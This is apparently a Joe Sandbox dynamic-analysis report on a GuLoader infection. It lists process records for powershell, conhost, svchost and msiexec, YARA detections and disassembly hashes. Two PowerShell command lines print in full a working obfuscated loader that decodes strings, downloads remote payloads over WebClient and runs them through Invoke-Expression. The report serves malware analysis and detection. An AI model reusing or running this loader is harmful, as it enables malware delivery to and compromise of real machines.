krPro.enNKampkueBygnin)');Meyers (Emissionskursers $Xenon);$autogiro=$Interorbital[0];$Optaktens=(Emissionskursers ' Bourr$Torde GForkueLK ereaoMartelbN,misma aalbnl Angli: Mode,ASunburRSta worOx cariGuijosVMultisEBeflowRPlakatiH velln UnescGKejser=determnGearedEGeneraW Udgav-OpsparoNonmagbArnottjPreappe articc yncomTlangtu StavefsBlndeaye.kefrS cupfutPenkeeES agmaMCentri.B burd$ jendoUIndlggNJul,anLNongo aUnbaliBForfodO UmistrSa,demITranceNLandomG');Meyers ($Optaktens);Meyers (Emissionskursers 'T rpen$R kninASh,wpir ecretrFarvebiEsti evSpildeeFritstrScuddyiTeutonnInstang.planc.Slu.reHIndstue UstemaR.nteudUrinrre.inuatrNord.es Main [Nongro$BrightGGaase atermi.rHaut.bc Analcoaffe tn ddann7f.rktr2misfat] Baryl=Bademe$ApicalSAntir p aadevlFo,mossPolarieTetrakr');$Railmen=Emissionskursers 'IntertD FeltmoVejskiwsmittenPhonoclSalicioF,rmalaSamoa dGuldinFInspe iKvrknil igfae';$Unweeping=Emissionskursers 'R ngwa$Offs,dAWongatr Sjaskr D,zziito.ingvBill,de allitrS aatriblacksnprocelg Comme.Deworm$Musco RH.rrelaIliopuiOmganglRiotoumCollegeBetragnKapit,.A flueI ta ninMarn,evFoxf,noUn ammkWelcheeSwampi(Middel$OveranaKeystou BougetGa acto Niveag Triumi DsenarInfr loColeus,bebygg$Res.mbHAfmrknyEmbathkApocenlOutbare Beshr)';$Hykle=$Ananasernes;Meyers (Emissionskursers 'Chambe$UncontG fr talCharksOFraterb AlterAOptrapltronst:IlannamUenighUBilledSAltereCNedbraomunifiVGrdetmiNulkom=Palaeo(R glant MarteeSte.ogs BoyarTCo,tem- BroddP mbiseaM,scletPsalmbh B erg Cchadd$Unnatuh Hypo YE tervkRa.ioal AfdelEUf.log)');while (!$Muscovi) {Meyers (Emissionskursers 'Dramat$BankrvgOverfolMavendoTilkenbV katiaSouthilSpl tt:BegyndM nskede gmainrImploro,ienerhKam.maeRevened SundhrK mmana meanil Nytaa=Arb,jd$Scelp BHar,liaAfslaplXantipuBrugerc uperch GalleiG lvantSemiwoh orsvaeGaloperSothooe') ;Meyers $Unweeping;Meyers (Emissionskursers 'Udrigg[Ani latOrcharHFredniRRudderEIndfataRundb dS,ansnII terbNNonin g Ido a.KluddetDeponeh T cksRClo ureInsatiaAirp,oDIdioma]Draebe:horosc:LeveriSRonaldLTach nEdo selEProcomp Qua b( Beamm4Outson0Supped0Brnebi0Betray)');Meyers (Emissionskursers ' ilate$JamanlgWowserLSang loSatyr BVerdena,ursusl ormal:Po.ariMScenogU Lacews ldkogCSupersoJuxtalvIrr taINonenf= Indiv(Pan ulT NrigsE ObjeksS orheT psvul-ProstopFordleaReturntPrepach Confe Ste l$ RymedhMeet nyYikemakOvermilElektrEPanteb)') ;Meyers (Emissionskursers 'Unpack$Ombygng KombilresundO StigebUnciv aLkk.stlOmbe,r:No melU sgsmadLsningLMeroblABwanasAAgnominglibchISnakk nGaardhGBarylee xonicr ericin,osshee Karto=,agmem$PatriagSkumsslFloraeoBu,iksBRhinocaM gnoll Fiske: Kvar T vespeeKithlenTandstS Tale,eSublots nstettDillwe+Slaaes+Gul nc%Vel et$Angrebi Re reNDar,hiTTortonE rvler dipoORevereRKonstaBAmerinIBrasbetKindlya OmnitlUnderp. Reinsc Ma,ksORasu.euIgnoren A,klit') ;$autogiro=$Interorbital[$Udlaaningerne]}$Genkendelsesgldes=450598;$Discommodes=31792;Meyers (Emissionskursers 'Dionas$Sc,lptGt,bercLJagt dO Ant cbHovediADi kdrlAureit: ejlfrOForudsuInco.ntGranosrRingtiIlavestvForejueKlevog Falho=Fotomo Mirl GS nipre LadegT Anspn-bandalCAssasso DemilnParatvtSkrupge behagn P.efeTDefunc Buffoa$Valk rhByggefYMintmakAgatysl Krimie');Meyers (Emissionskursers 'Pro on$SponsigSkole,l Un.emoMorosibBronstaBl,torlFalsks:Da friFSidiafrBlem si Tumbrgaptereg Fo sgaIp podsEpitaf Politi=Sancyi Dypnin[Rampe,SK,ststyGavnlisEfterttProbere DarwimAffl x.S ofmnCPri ato amilinpromisvYeardfeSaladirSindsbt Efter]A ambi: Geoto:KirketFtelio.rBrevaaoDonsiemReprepBFornufa F,lcosUndeciePalmes6Hofl.v4Mashy SRavagetSolh trPiedesiCheepsnBesvreg Kdeda(Femini$Ke nerOStigb.uRigsantN nocurAnomali Emir vAfspejeDyrtid)');Meyers (Emissionskursers 'A skil$ ResurgDupliclU,selhoInstrub CurreaGnomolLMicroc:Al erdH naverATrolloiImpastREternap .eminiIndbeteNonconc Supp E PolixsHensid Immor,=C,asse Ove de[ Colums BoardySi,hons Oral T aanenEAfvrgemI,iaut. b,rdeTAffricEweekenXPulserTPantei. MiscoEGrundlN Hjr,sCblack,oGr sesdOverspi BenzoNPedestG Lek r]E sfar:Skrald:SociosaUnbundSUntremcTurtosITribulIAstipu.bohe sGAsked EOptageTSapr.zsEkstraTBe tiaRMidbaniOverdenGreendGCruisi(Marent$FrerhuFFusionRJoylesiRa.erkg SmrokGKursusA NordasB.ndol)');Meyers (Emissionskursers 'homolo$Skrto gVacuoll BandeoLie erBDeglamAUv alrlCrossk:A tianEMet olMInsu tETroll nUd oerdi,expaAMeloidtF.sobaiCrouchODi.socnBacktrEUd indrVerveln Re.dieT.nkel=Knogle$ K,ntrH Gad daKulakiI.rander SociapFred.iIAllerveR.msteCLast iEmasochsColour.Stansnspolydiu ColorBSanin,sgrayliTSpoonbR,aseloiKyakgyNOverlegYe ked(Aktivi$waff,egEpicurE SlubbNIntetkKBat.ysEInter,NKnivstDLiturgETodageLMetwanS vedeePju,kpsOverprGKvastblCrossrd UnambEOverp SC,ncel,Highla$TokenlDTortoiIHypomasBhutlaCHe ophOPrivatmMediatMGgemadOTaljebD AfslrEBlaekcs Overt)');Meyers $Emendationerne;"
                                    Imagebase:0x7ff745e70000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true
                                    Show Windows behavior

                                    File Activities

                                    Show Windows behavior

                                    Section Activities

                                    Show Windows behavior

                                    Registry Activities

                                    Show Windows behavior

                                    COM Activities

                                    Powershell Activities

                                    Show Windows behavior

                                    Mutex Activities

                                    Show Windows behavior

                                    Process Activities

                                    Show Windows behavior

                                    Thread Activities

                                    Show Windows behavior

                                    Memory Activities

                                    Show Windows behavior

                                    System Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    Show Windows behavior

                                    Windows UI Activities

                                    Process Token Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                    General

                                    Target ID:5
                                    Start time:02:12:24
                                    Start date:08/04/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff74be10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true
                                    Show Windows behavior

                                    File Activities

                                    Show Windows behavior

                                    Section Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    Show Windows behavior

                                    Mutex Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    Show Windows behavior

                                    Thread Activities

                                    Show Windows behavior

                                    Memory Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    Show Windows behavior

                                    Windows UI Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                    General

                                    Target ID:7
                                    Start time:02:12:35
                                    Start date:08/04/2025
                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Philologer='func';Get-History;$Philologer+='t';Get-History;$Philologer+='i';$Stttevvenes=Get-History;$Philologer+='on:';$Stttevvenes=Get-History;(ni -p $Philologer -n Emissionskursers -value { param($Flavourfully);$Modstillingens=6;do {$Metallographically+=$Flavourfully[$Modstillingens];$Modstillingens+=7} until(!$Flavourfully[$Modstillingens])$Metallographically});(ni -p $Philologer -n Meyers -value {param($Gestikulerende);.($Hjlpelsestes) ($Gestikulerende)});ConvertTo-Html;$Unlaboring=Emissionskursers 'MaanedNWro,gieRapturtUst la.EmbersW';$Unlaboring+=Emissionskursers ' Ghe tEHhvsysbModstacSlightLRykke IS.lvove TransnUvir,eT';$Splser=Emissionskursers 'revaliMRappegoHeliorzHo,fbeiregteulSedestlOverasaPred.c/';$Tilbindes=Emissionskursers 'FrenesTA arthlEcuadosReg,on1 Holly2';$Xenon='Sahari[Zigge,N andepebruu sTUnpriv.CeylonsDealmaesignifrdisembVAfmaaliafsondCHeuvelekomm.npPalladoUdskivISprednnFairl tForsulMAkkordaDe imaNMobiliALb.inggOverheeje aldRKerne.]Myster:Sikk r:SvejtsSEnfeebe ilsacPostkauErythrrD.zzieIHelmedTTwankmYInvtunpRe.ksaR NoninOSubgovt nmesmOT ldvsCEpideroS.xtanL Tphst=Endowm$ ec estTot enI AnisoLInsultB rugeriB aujoN AfhenD Ej ndEKara ts';$Splser+=Emissionskursers 'lainer5Lystba.Tr.mas0Centra Polyba(AbysmtW Smarti stivnSkur.adAfhoppoHus arwTufstesTnds i .ootdaNKldedrTMeroga Chelon1F reca0Diammi.Forbru0Kurede;Transp ProspeW BuskpiTryksanDroum.6Indfle4Bag,li;Glycer Susc.px ingm6 G ran4Sh ysi;Succul SamfunrPrespavNazifi:Se isa1Mellem3Jarbot4Inter .Idioch0 yperf) Voter In arbGAkkompeHitheoc unsankPortlioTskede/Grimac2Bidd t0collar1wor.le0Ov rbr0Macken1Murder0Eccles1Molli .parlaFbandaiiScandirSimulteUnwilffSpringo SpankxDendri/Larees1Ove,be3Auricu4Subaci.Seizu,0';$Garcon72=Emissionskursers 'CircumU eceles likkeT,enstRKabe l-UnconfABekranGK.sserepipefinChapout';$autogiro=Emissionskursers ' Pro,th Vir etArvef tOverstpNabobisOrdina:benefi/ Objec/ Afta.kOmegnsa Mi terSprjteu orepon PretiaFu ktivMorbi.rAftalei Enco.kMuch osHematohCaravaaEkspon. Con uo CheckrMetallgGarder/Quilk i One.em Mu tiaHelvetgReagiceApo.tasStorag/Ste nfiCorpornAftrapnBe oyao afvrgcJ dingeumlautnBourg c .esube Nonde.MarskamArts,lsRaglanopiassa>SortiehSublimt Pleurt Tinc p mpede:Levned/Bescra/D wnloaChola.lMaaleshFotostaBlotttlNephroaBagloklUnciv,a ulils AtteniOccamia Helbr.Sonateo FrimrrPla.ssgUnmora/ Denias EndrgeFlewspaFattilrOu,voicAftenshMerge /Mi iciiWalisen MashrnUnfrozoLegi ncNonth.ePrefernReauthcDet cheRntgen.ThreapmHoftehsFritimo';$Blokregistreringerne=Emissionskursers ' Aari,>';$Hjlpelsestes=Emissionskursers ' Frysei nonimeultratX';$Radiata='Gennemkre';$Bevbne='\Motorgadens.Alb';Meyers (Emissionskursers 'Kro.us$ NglevgLicansLFrilufoBo friBgio ita Dekl.lTakk l:Ult aiaBindebnRenipuA PrelaN San,bASursumSKreditenonv,srBedstenHvssesE Udp sSBortkr=Af eud$Scle,oEArgusbnForgrev Oenol: Paa.ia Homo p ntermp,uperaD Ta tfaPreflat A gteaSpartl+ Besvr$Ov,rcoB,eboeleHornhiVI terpB infeeNh.miame');Meyers (Emissionskursers ' Polys$ KlinigKomi elSocio OSukkerbUnder AProvinlBrnefl:CaptaniDrilnin p owhTtypewrEUopf.lrJaz.reoCephusrForsorBK.mseniWoolleTta noiAtrsaltLWarsza=Ginnen$CurrisAA bergUInter.tDelighoReflyig Gynkoi TroldrFintfoOBagee .RekurrsPapirkP.rticaltafle.iTra letHov ds(D,mult$Altsaxb Omsl,lFiggieO Afrakk.letteRmedkmpEJejunagbr dgrImyologsDo.sonTAvsharR .erbrePolychRFangsiI LapniNStr,teg StudeEProj krPro.enNKampkueBygnin)');Meyers (Emissionskursers $Xenon);$autogiro=$Interorbital[0];$Optaktens=(Emissionskursers ' Bourr$Torde GForkueLK ereaoMartelbN,misma aalbnl Angli: Mode,ASunburRSta worOx cariGuijosVMultisEBeflowRPlakatiH velln UnescGKejser=determnGearedEGeneraW Udgav-OpsparoNonmagbArnottjPreappe articc yncomTlangtu StavefsBlndeaye.kefrS cupfutPenkeeES agmaMCentri.B burd$ jendoUIndlggNJul,anLNongo aUnbaliBForfodO UmistrSa,demITranceNLandomG');Meyers ($Optaktens);Meyers (Emissionskursers 'T rpen$R kninASh,wpir ecretrFarvebiEsti evSpildeeFritstrScuddyiTeutonnInstang.planc.Slu.reHIndstue UstemaR.nteudUrinrre.inuatrNord.es Main [Nongro$BrightGGaase atermi.rHaut.bc Analcoaffe tn ddann7f.rktr2misfat] Baryl=Bademe$ApicalSAntir p aadevlFo,mossPolarieTetrakr');$Railmen=Emissionskursers 'IntertD FeltmoVejskiwsmittenPhonoclSalicioF,rmalaSamoa dGuldinFInspe iKvrknil igfae';$Unweeping=Emissionskursers 'R ngwa$Offs,dAWongatr Sjaskr D,zziito.ingvBill,de allitrS aatriblacksnprocelg Comme.Deworm$Musco RH.rrelaIliopuiOmganglRiotoumCollegeBetragnKapit,.A flueI ta ninMarn,evFoxf,noUn ammkWelcheeSwampi(Middel$OveranaKeystou BougetGa acto Niveag Triumi DsenarInfr loColeus,bebygg$Res.mbHAfmrknyEmbathkApocenlOutbare Beshr)';$Hykle=$Ananasernes;Meyers (Emissionskursers 'Chambe$UncontG fr talCharksOFraterb AlterAOptrapltronst:IlannamUenighUBilledSAltereCNedbraomunifiVGrdetmiNulkom=Palaeo(R glant MarteeSte.ogs BoyarTCo,tem- BroddP mbiseaM,scletPsalmbh B erg Cchadd$Unnatuh Hypo YE tervkRa.ioal AfdelEUf.log)');while (!$Muscovi) {Meyers (Emissionskursers 'Dramat$BankrvgOverfolMavendoTilkenbV katiaSouthilSpl tt:BegyndM nskede gmainrImploro,ienerhKam.maeRevened SundhrK mmana meanil Nytaa=Arb,jd$Scelp BHar,liaAfslaplXantipuBrugerc uperch GalleiG lvantSemiwoh orsvaeGaloperSothooe') ;Meyers $Unweeping;Meyers (Emissionskursers 'Udrigg[Ani latOrcharHFredniRRudderEIndfataRundb dS,ansnII terbNNonin g Ido a.KluddetDeponeh T cksRClo ureInsatiaAirp,oDIdioma]Draebe:horosc:LeveriSRonaldLTach nEdo selEProcomp Qua b( Beamm4Outson0Supped0Brnebi0Betray)');Meyers (Emissionskursers ' ilate$JamanlgWowserLSang loSatyr BVerdena,ursusl ormal:Po.ariMScenogU Lacews ldkogCSupersoJuxtalvIrr taINonenf= Indiv(Pan ulT NrigsE ObjeksS orheT psvul-ProstopFordleaReturntPrepach Confe Ste l$ RymedhMeet nyYikemakOvermilElektrEPanteb)') ;Meyers (Emissionskursers 'Unpack$Ombygng KombilresundO StigebUnciv aLkk.stlOmbe,r:No melU sgsmadLsningLMeroblABwanasAAgnominglibchISnakk nGaardhGBarylee xonicr ericin,osshee Karto=,agmem$PatriagSkumsslFloraeoBu,iksBRhinocaM gnoll Fiske: Kvar T vespeeKithlenTandstS Tale,eSublots nstettDillwe+Slaaes+Gul nc%Vel et$Angrebi Re reNDar,hiTTortonE rvler dipoORevereRKonstaBAmerinIBrasbetKindlya OmnitlUnderp. Reinsc Ma,ksORasu.euIgnoren A,klit') ;$autogiro=$Interorbital[$Udlaaningerne]}$Genkendelsesgldes=450598;$Discommodes=31792;Meyers (Emissionskursers 'Dionas$Sc,lptGt,bercLJagt dO Ant cbHovediADi kdrlAureit: ejlfrOForudsuInco.ntGranosrRingtiIlavestvForejueKlevog Falho=Fotomo Mirl GS nipre LadegT Anspn-bandalCAssasso DemilnParatvtSkrupge behagn P.efeTDefunc Buffoa$Valk rhByggefYMintmakAgatysl Krimie');Meyers (Emissionskursers 'Pro on$SponsigSkole,l Un.emoMorosibBronstaBl,torlFalsks:Da friFSidiafrBlem si Tumbrgaptereg Fo sgaIp podsEpitaf Politi=Sancyi Dypnin[Rampe,SK,ststyGavnlisEfterttProbere DarwimAffl x.S ofmnCPri ato amilinpromisvYeardfeSaladirSindsbt Efter]A ambi: Geoto:KirketFtelio.rBrevaaoDonsiemReprepBFornufa F,lcosUndeciePalmes6Hofl.v4Mashy SRavagetSolh trPiedesiCheepsnBesvreg Kdeda(Femini$Ke nerOStigb.uRigsantN nocurAnomali Emir vAfspejeDyrtid)');Meyers (Emissionskursers 'A skil$ ResurgDupliclU,selhoInstrub CurreaGnomolLMicroc:Al erdH naverATrolloiImpastREternap .eminiIndbeteNonconc Supp E PolixsHensid Immor,=C,asse Ove de[ Colums BoardySi,hons Oral T aanenEAfvrgemI,iaut. b,rdeTAffricEweekenXPulserTPantei. MiscoEGrundlN Hjr,sCblack,oGr sesdOverspi BenzoNPedestG Lek r]E sfar:Skrald:SociosaUnbundSUntremcTurtosITribulIAstipu.bohe sGAsked EOptageTSapr.zsEkstraTBe tiaRMidbaniOverdenGreendGCruisi(Marent$FrerhuFFusionRJoylesiRa.erkg SmrokGKursusA NordasB.ndol)');Meyers (Emissionskursers 'homolo$Skrto gVacuoll BandeoLie erBDeglamAUv alrlCrossk:A tianEMet olMInsu tETroll nUd oerdi,expaAMeloidtF.sobaiCrouchODi.socnBacktrEUd indrVerveln Re.dieT.nkel=Knogle$ K,ntrH Gad daKulakiI.rander SociapFred.iIAllerveR.msteCLast iEmasochsColour.Stansnspolydiu ColorBSanin,sgrayliTSpoonbR,aseloiKyakgyNOverlegYe ked(Aktivi$waff,egEpicurE SlubbNIntetkKBat.ysEInter,NKnivstDLiturgETodageLMetwanS vedeePju,kpsOverprGKvastblCrossrd UnambEOverp SC,ncel,Highla$TokenlDTortoiIHypomasBhutlaCHe ophOPrivatmMediatMGgemadOTaljebD AfslrEBlaekcs Overt)');Meyers $Emendationerne;"
                                    Imagebase:0xd20000
                                    File size:433'152 bytes
                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000002.2119893236.00000000092E7000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high
                                    Has exited:true
                                    Show Windows behavior

                                    File Activities

                                    Show Windows behavior

                                    Section Activities

                                    Show Windows behavior

                                    Registry Activities

                                    Show Windows behavior

                                    COM Activities

                                    Powershell Activities

                                    Show Windows behavior

                                    Mutex Activities

                                    Show Windows behavior

                                    Process Activities

                                    Show Windows behavior

                                    Thread Activities

                                    Show Windows behavior

                                    Memory Activities

                                    Show Windows behavior

                                    System Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    Show Windows behavior

                                    Windows UI Activities

                                    Process Token Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                    General

                                    Target ID:8
                                    Start time:02:12:35
                                    Start date:08/04/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff74be10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false
                                    Show Windows behavior

                                    File Activities

                                    Show Windows behavior

                                    Section Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    Show Windows behavior

                                    Mutex Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    Show Windows behavior

                                    Thread Activities

                                    Show Windows behavior

                                    Memory Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    Show Windows behavior

                                    Windows UI Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                    General

                                    Target ID:9
                                    Start time:02:12:44
                                    Start date:08/04/2025
                                    Path:C:\Windows\System32\svchost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                    Imagebase:0x7ff78b730000
                                    File size:55'320 bytes
                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    Show Windows behavior

                                    Section Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    Show Windows behavior

                                    Process Activities

                                    Show Windows behavior

                                    Thread Activities

                                    Show Windows behavior

                                    Memory Activities

                                    Show Windows behavior

                                    System Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                    General

                                    Target ID:18
                                    Start time:02:14:12
                                    Start date:08/04/2025
                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                    Imagebase:0xa50000
                                    File size:59'904 bytes
                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000012.00000002.2336376984.0000000004897000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high
                                    Has exited:false
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    Show Windows behavior

                                    Section Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    Show Windows behavior

                                    Memory Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                    Disassembly

                                    Executed Functions

                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1158187109.00007FF9C1DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C1DD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_7ff9c1dd0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 389720067454cd8bd87133c57cc9c7458d80a87fd6db53da6563ddcee663a22a
                                    • Instruction ID: 74494cbb4c758ad89e72023cc259ad24933f4385162460a6f1f7688c1ba7c7b9
                                    • Opcode Fuzzy Hash: 389720067454cd8bd87133c57cc9c7458d80a87fd6db53da6563ddcee663a22a
                                    • Instruction Fuzzy Hash: 2B12066190D7C64FE356EB7848653B57FA1EF53220B0901FBE089CB4D3D9486C8AC7A6
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1158187109.00007FF9C1DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C1DD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_7ff9c1dd0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 097b755d5c8474b1e039d6e429f20a42e17173321194954c0813b6bacc6dc100
                                    • Instruction ID: 206eb5144e774add3666f2484f4cc256796b2e1a162f45354407928e48ca49a1
                                    • Opcode Fuzzy Hash: 097b755d5c8474b1e039d6e429f20a42e17173321194954c0813b6bacc6dc100
                                    • Instruction Fuzzy Hash: 80F11422A0DB860FE396EB2858553A47FE1EF56220F1901FED04CC71D3DE596C8ACB52
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1157689768.00007FF9C1D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C1D00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_7ff9c1d00000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 406244c88017b3bb50e3b05194f31c495aac013fa7b3b42d5442b3c40446fa80
                                    • Instruction ID: 1f495bd0e8eecd6c8f576ce082440f946875641dd82f8c097993b4ed5e123f1d
                                    • Opcode Fuzzy Hash: 406244c88017b3bb50e3b05194f31c495aac013fa7b3b42d5442b3c40446fa80
                                    • Instruction Fuzzy Hash: 40D16330A18A4E8FEBA8DF28C8557E977D1FB54310F44826ED80DC7295DF74A985CB81
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1157689768.00007FF9C1D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C1D00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_7ff9c1d00000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 94de4ba9ce09da606d10a1725e252d9ff50c1f2fcc4c69d96a4ed55656c3e272
                                    • Instruction ID: 40949c249a47b0fbb0744a9341d7913ca82b5c04134b5ee1d86ddc44871b184b
                                    • Opcode Fuzzy Hash: 94de4ba9ce09da606d10a1725e252d9ff50c1f2fcc4c69d96a4ed55656c3e272
                                    • Instruction Fuzzy Hash: 7BD17130A08A4E8FEBA8DF28D8557E977D1FB54310F54826AD80DC72A5CE74A985CB81
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1158187109.00007FF9C1DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C1DD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_7ff9c1dd0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ca027baa9f5012e83b8adf5e60379f0c58030571a1859932991f80b2faa1cbde
                                    • Instruction ID: 79d50f72961bc320009d331cbe19b919974ebb419d2cbff5b85de41740c0c7f2
                                    • Opcode Fuzzy Hash: ca027baa9f5012e83b8adf5e60379f0c58030571a1859932991f80b2faa1cbde
                                    • Instruction Fuzzy Hash: 77E13922A0CB864FF795EB2858553797BD1EF55320F1801BED00DC71C3DE68AC898B96
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1158187109.00007FF9C1DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C1DD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_7ff9c1dd0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: affbd4b0f5178780576793c28c8932796d747006947bf146d6aba27d97f8622a
                                    • Instruction ID: 650ff6516df88b881f0cb2cd75b0a892e043d56c84b99fc80b0f6ef35de76806
                                    • Opcode Fuzzy Hash: affbd4b0f5178780576793c28c8932796d747006947bf146d6aba27d97f8622a
                                    • Instruction Fuzzy Hash: E8C11621A0CB8A4FF7A5EB2C48547757BE1EF56214B0801FED04ECB1D3DE58AC8987A5
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1157689768.00007FF9C1D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C1D00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_7ff9c1d00000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: baf28dba29833b8a345f8e54b8ceeafe36ae255d6ed89f6782679e3ba830c59a
                                    • Instruction ID: b61475bc6fe76186530e6316fdffea2b06a2e1b83109a08f3d3b6685c8563edf
                                    • Opcode Fuzzy Hash: baf28dba29833b8a345f8e54b8ceeafe36ae255d6ed89f6782679e3ba830c59a
                                    • Instruction Fuzzy Hash: CAD19E31A18A4E8FDF84EF5CC495AE97BA1FF68300F54426AD40DD7292DB64F885CB80
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1158187109.00007FF9C1DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C1DD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_7ff9c1dd0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d25f093d121ff8cf52290a19332548c6a1668fc3b75ff7dd918dd2328a347ff8
                                    • Instruction ID: fd625b9f171cee1b46a57e50a44cc657a6dc75d05380270333b45d61e1a8a5cd
                                    • Opcode Fuzzy Hash: d25f093d121ff8cf52290a19332548c6a1668fc3b75ff7dd918dd2328a347ff8
                                    • Instruction Fuzzy Hash: D2B15631A0DA8A0FF795EB6C48147B97BD1EF65324B1801FAD00DC71D3EE19AC898791
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1157689768.00007FF9C1D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C1D00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_7ff9c1d00000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 61a9658675e60ae376ea0dce2423052c32d03ba5a7d6fc5b31981c0bf710faf5
